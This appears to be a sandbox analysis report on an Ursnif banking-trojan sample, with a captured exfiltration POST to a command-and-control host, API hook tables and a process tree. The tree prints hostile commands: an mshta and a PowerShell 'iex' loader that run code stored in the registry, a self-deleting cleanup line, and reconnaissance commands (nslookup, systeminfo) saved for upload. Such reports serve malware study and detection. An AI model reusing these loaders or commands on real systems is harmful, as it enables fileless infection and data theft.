                                                        May 4, 2022 16:21:37.325897932 CEST12991OUTPOST /images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=315998012542640097891134987170
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: cabrioxmdes.at
                                                        Content-Length: 387
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        Data Raw: 2d 2d 33 31 35 39 39 38 30 31 32 35 34 32 36 34 30 30 39 37 38 39 31 31 33 34 39 38 37 31 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 34 43 32 2e 62 69 6e 22 0d 0a 0d 0a c4 3a 05 dc 08 18 e8 11 ed cf a4 0c ab c1 02 66 7d 8c 42 f8 e1 54 84 bf 45 eb 69 35 db 71 df 5a 7f 36 2e 39 a9 d4 bc 44 3f a5 2d 4f e4 77 6d 4d e9 fd cb 9f 34 d3 52 90 c7 ef 96 8b 3a 51 52 33 1e 4e d7 58 12 20 f0 a1 ba 72 e2 a4 65 f4 9c 4a ba eb 0d a4 54 4a 8d a0 e6 5c df 1a 39 1e 99 48 4e bf 06 66 06 d2 5a c9 d5 25 ba ab df 3a 46 79 a9 9f 83 41 05 5b 19 68 e6 69 3c fa 64 22 5f d7 f5 51 fa 1a 19 70 83 6d 10 60 e4 02 29 a5 fe f7 70 0e ed 73 f8 c2 02 d4 cc d9 86 fb 43 90 cd b5 d4 4d 65 6e f2 f6 86 52 19 54 55 bf bc d5 03 6f 02 d5 2c db 53 12 f0 55 f2 6b bf 87 b2 cc aa 53 11 20 16 69 ac 25 cc fe 66 c8 96 93 c4 85 7f df 36 8f ff e7 40 65 fe 99 ce cc 93 52 c1 0b 35 49 c7 bb e4 4a 3a 27 ce 10 6b ec c7 39 84 5a 65 f9 0d 0a 2d 2d 33 31 35 39 39 38 30 31 32 35 34 32 36 34 30 30 39 37 38 39 31 31 33 34 39 38 37 31 37 30 2d 2d 0d 0a
                                                        Data Ascii: --315998012542640097891134987170Content-Disposition: form-data; name="upload_file"; filename="84C2.bin":f}BTEi5qZ6.9D?-OwmM4R:QR3NX reJTJ\9HNfZ%:FyA[hi<d"_Qpm`)psCMenRTUo,SUkS i%f6@eR5IJ:'k9Ze--315998012542640097891134987170--
                                                        May 4, 2022 16:21:38.620135069 CEST12997INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:21:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Connection: close
                                                        Vary: Accept-Encoding


                                                        Code Manipulations

                                                        User Modules

                                                        Hook Summary

                                                        Function NameHook TypeActive in Processes
                                                        CreateProcessAsUserWEATexplorer.exe
                                                        CreateProcessAsUserWINLINEexplorer.exe
                                                        CreateProcessWEATexplorer.exe
                                                        CreateProcessWINLINEexplorer.exe
                                                        CreateProcessAEATexplorer.exe
                                                        CreateProcessAINLINEexplorer.exe
                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe

                                                        Processes

                                                        Process: explorer.exe, Module: KERNEL32.DLL
                                                        Function NameHook TypeNew Data
                                                        CreateProcessAsUserWEAT7FF80250521C
                                                        CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                        CreateProcessWEAT7FF802505200
                                                        CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                        CreateProcessAEAT7FF80250520E
                                                        CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                        Process: explorer.exe, Module: WININET.dll
                                                        Function NameHook TypeNew Data
                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FF802505200
                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT7E3B6B0
                                                        Process: explorer.exe, Module: user32.dll
                                                        Function NameHook TypeNew Data
                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FF802505200
                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT7E3B6B0

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:16:18:46
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\loaddll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll"
                                                        Imagebase:0x110000
                                                        File size:116736 bytes
                                                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:1
                                                        Start time:16:18:46
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                                                        Imagebase:0x1190000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:2
                                                        Start time:16:18:46
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                                                        Imagebase:0x11a0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        General

                                                        Target ID:19
                                                        Start time:16:19:23
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\mshta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                                                        Imagebase:0x7ff70ad70000
                                                        File size:14848 bytes
                                                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:20
                                                        Start time:16:19:26
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                                        Imagebase:0x7ff6ba650000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        General

                                                        Target ID:21
                                                        Start time:16:19:26
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:22
                                                        Start time:16:19:38
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                                                        Imagebase:0x7ff7cb6d0000
                                                        File size:2739304 bytes
                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:moderate

                                                        General

                                                        Target ID:23
                                                        Start time:16:19:41
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"
                                                        Imagebase:0x7ff7bf6d0000
                                                        File size:47280 bytes
                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Target ID:24
                                                        Start time:16:19:44
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\control.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\control.exe -h
                                                        Imagebase:0x7ff6a5e80000
                                                        File size:117760 bytes
                                                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        General

                                                        Target ID:25
                                                        Start time:16:19:45
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                                                        Imagebase:0x7ff7cb6d0000
                                                        File size:2739304 bytes
                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:moderate

                                                        General

                                                        Target ID:26
                                                        Start time:16:19:47
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"
                                                        Imagebase:0x7ff7bf6d0000
                                                        File size:47280 bytes
                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Target ID:27
                                                        Start time:16:19:56
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff6f3b00000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:33
                                                        Start time:16:20:11
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:34
                                                        Start time:16:20:13
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:35
                                                        Start time:16:20:15
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\PING.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:ping localhost -n 5
                                                        Imagebase:0x7ff689210000
                                                        File size:21504 bytes
                                                        MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:36
                                                        Start time:16:20:20
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                        Imagebase:0x7ff6b45b0000
                                                        File size:99272 bytes
                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security

                                                        General

                                                        Target ID:37
                                                        Start time:16:20:20
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\rundll32.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                                                        Imagebase:0x7ff67f250000
                                                        File size:69632 bytes
                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                        General

                                                        Target ID:38
                                                        Start time:16:20:23
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:40
                                                        Start time:16:20:26
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:42
                                                        Start time:16:20:27
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\nslookup.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:nslookup myip.opendns.com resolver1.opendns.com
                                                        Imagebase:0x7ff713510000
                                                        File size:86528 bytes
                                                        MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:44
                                                        Start time:16:20:35
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:45
                                                        Start time:16:20:37
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                        Imagebase:0x7ff6b45b0000
                                                        File size:99272 bytes
                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                        General

                                                        Target ID:46
                                                        Start time:16:20:42
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:48
                                                        Start time:16:20:59
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1"
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:49
                                                        Start time:16:20:59
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                        Imagebase:0x7ff6b45b0000
                                                        File size:99272 bytes
                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security

                                                        General

                                                        Target ID:51
                                                        Start time:16:21:05
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Disassembly

                                                        No disassembly